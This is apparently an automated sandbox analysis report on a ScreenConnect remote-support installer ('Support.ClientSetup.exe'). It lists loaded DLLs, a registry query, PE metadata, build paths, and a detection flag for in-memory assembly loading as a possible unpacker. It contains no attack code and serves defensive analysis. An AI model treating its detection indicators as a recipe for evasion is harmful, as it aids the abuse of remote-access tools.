                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: Support.ClientSetup.exeStatic PE information: certificate valid
                                  Source: Support.ClientSetup.exeStatic file information: File size 5622816 > 1048576
                                  Source: Support.ClientSetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: Support.ClientSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Support.ClientSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Support.ClientSetup.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1103254270.00000000000AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1083284190.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Support.ClientSetup.exe, MSI837B.tmp.3.dr, 3b7ed6.rbs.3.dr, MSI8185.tmp.3.dr, 3b7ed7.msi.3.dr, MSI8195.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Support.ClientSetup.exe, MSI7753.tmp.2.dr, 3b7ed7.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: Support.ClientSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: Support.ClientSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: Support.ClientSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: Support.ClientSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: 0.0.Support.ClientSetup.exe.11778ec.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.2.Support.ClientSetup.exe.1d40000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: Support.ClientSetup.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55e8a8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F46460 pushfd ; retf 0_2_05F46461
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F43635 pushfd ; ret 0_2_05F43633
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F43AD7 push ebx; retf 0_2_05F43ADA
